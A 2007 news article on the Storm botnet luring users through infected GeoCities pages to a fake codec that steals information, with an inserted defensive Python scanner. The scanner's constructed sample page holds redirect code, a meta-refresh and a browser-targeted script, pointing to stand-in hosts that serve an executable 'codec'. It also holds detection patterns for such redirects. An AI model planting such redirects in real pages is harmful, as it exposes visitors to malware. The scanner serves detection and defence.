ARN

Storm botnet spreading malware through GeoCities

Hackers linked to the vanished Russian Business Network involved, says Trend Micro researcher
Gregg Keizer (Computerworld)  19 November, 2007 07:27:59

Storm, the botnet-building Trojan horse, has come up with another twist to dupe users into infecting their PCs with malware, a security researcher said last week.

Longtime clients of the Russian Business Network (RBN), a notorious hacker- and malware-hosting network that mysteriously vanished after shifting operations from St. Petersburg, Russia, to Shanghai, are involved in the attack, said Paul Ferguson, network architect at Trend Micro.

Yesterday, Trend watched as existing bots controlled by Storm were seeded with new spam templates that included links to sites on GeoCities, the free Web hosting service owned by Yahoo. Today, Storm kicked off the new attacks. "This has developed into a full-fledged attack vector," Ferguson said.

The GeoCities sites are infected with malicious JavaScript code that redirects the user's browser to secondary URLs hosted in Turkey, Ferguson said. The Turkish URLs, meanwhile, try to persuade the user to download a new codec that's supposedly necessary to view images on the GeoCities sites. According to Trend Micro's analysis, the bogus codec -- which claims to be for the 360-degree IPIX format -- is actually an identity- and information-stealing piece of malware.
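The chain Ferguson describes has two stages a defender can check for without running the page: a script or meta tag on the free-hosting page that navigates the browser somewhere else, and a second-stage target that hands out an executable dressed up as a codec. The scanner below is an added example, not Trend Micro's code or anything from the article; the HTML it inspects is a constructed sample, and the `.example.tr` hostnames in it are made up to stand in for the Turkish URLs mentioned above. It extracts automatic redirects from a page, flags those that leave the hosting domain, and labels any that point straight at an executable.

```python
import re
from urllib.parse import urlparse

# Constructed sample of the kind of page the article describes: a free-hosting
# page whose script and meta tag send the browser to off-site "codec" lures.
# This HTML is made up for the example; it is not a capture of a real page.
SAMPLE_PAGE = """
<html><head><title>My photos</title>
<meta http-equiv="refresh" content="0;url=http://codec-download.example.tr/ipix/codec.exe">
<script>
  if (navigator.userAgent.indexOf("MSIE") != -1) {
    window.location.href = "http://img-viewer.example.tr/view.php?id=42";
  }
</script>
</head><body>
<a href="http://www.geocities.com/someuser/album2.html">next album</a>
<a href="/someuser/about.html">about me</a>
</body></html>
"""

# Common ways a page forces a navigation without a click. Group 1 is the target.
REDIRECT_PATTERNS = [
    # window.location = "...", location.href = '...', top.location = "..."
    re.compile(r"""(?:window\.|self\.|top\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']""", re.I),
    # location.replace("...") / location.assign('...')
    re.compile(r"""location\.(?:replace|assign)\s*\(\s*["']([^"']+)["']\s*\)""", re.I),
    # <meta http-equiv="refresh" content="0;url=...">
    re.compile(r"""<meta[^>]+http-equiv\s*=\s*["']?refresh["']?[^>]+url\s*=\s*["']?([^"'>\s]+)""", re.I),
]

# File types a "codec" lure typically serves; assumed list for the example.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".cab", ".msi", ".com", ".bat")


def extract_redirects(html):
    """Return every URL the page navigates to automatically, in pattern order."""
    found = []
    for pat in REDIRECT_PATTERNS:
        for m in pat.finditer(html):
            found.append(m.group(1))
    return found


def offsite_redirects(html, hosting_domain):
    """Redirect targets whose host is not the hosting domain or a subdomain of it.

    Relative URLs have no host and stay on the hosting page's origin, so they
    are not flagged; only absolute URLs pointing elsewhere are returned.
    """
    hosting_domain = hosting_domain.lower()
    flagged = []
    for url in extract_redirects(html):
        host = urlparse(url).hostname
        if host is None:
            continue
        host = host.lower()
        if host != hosting_domain and not host.endswith("." + hosting_domain):
            flagged.append(url)
    return flagged


def classify(url):
    """'download' if the target is an executable (the fake-codec pattern), else 'redirect'."""
    path = urlparse(url).path.lower()
    return "download" if path.endswith(EXECUTABLE_SUFFIXES) else "redirect"


if __name__ == "__main__":
    for url in offsite_redirects(SAMPLE_PAGE, "geocities.com"):
        print(f"{classify(url):8s} {url}")
```

Run against the constructed page, this reports the meta-refresh target as a `download` (it ends in `.exe`) and the script's target as a `redirect`; the two GeoCities links are left alone because they stay on the hosting domain. The patterns cover the plain forms of redirection only; obfuscated scripts of the kind common on compromised hosting pages need to be decoded or executed in a sandbox first.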

Fake codecs have become the latest choice of hackers, with several notable attacks recently relying on users' naivete about what a codec is, why it might be necessary and why they can be untrustworthy. The attacks last week that originated at hacked MySpace pages -- including R&B singer Alicia Keys' -- touted phony codecs, for example.

That Storm has turned to hyping codecs tells Ferguson that the botnet's controllers are nimble and flexible in their approach to social engineering. "They're intertwining codecs with other types of social engineering," he said.

By his reckoning, Storm has become much more than just a name for a malware family. "It's actually a covert channel of distribution for these [bad] guys," he said. "It's a communication network, a way for them to communicate information they want to seed," whether a round of spam touting penny stocks or a new piece of malware. "And it's a way for them to get what they've collected" from the now-compromised computers, he added. "It's a covert network."

Ferguson also said that there was evidence that known RBN customers were responsible for this newest use of Storm's botnet. "Some of the same RBN operators are involved," Ferguson said. "It's some of the same crew."
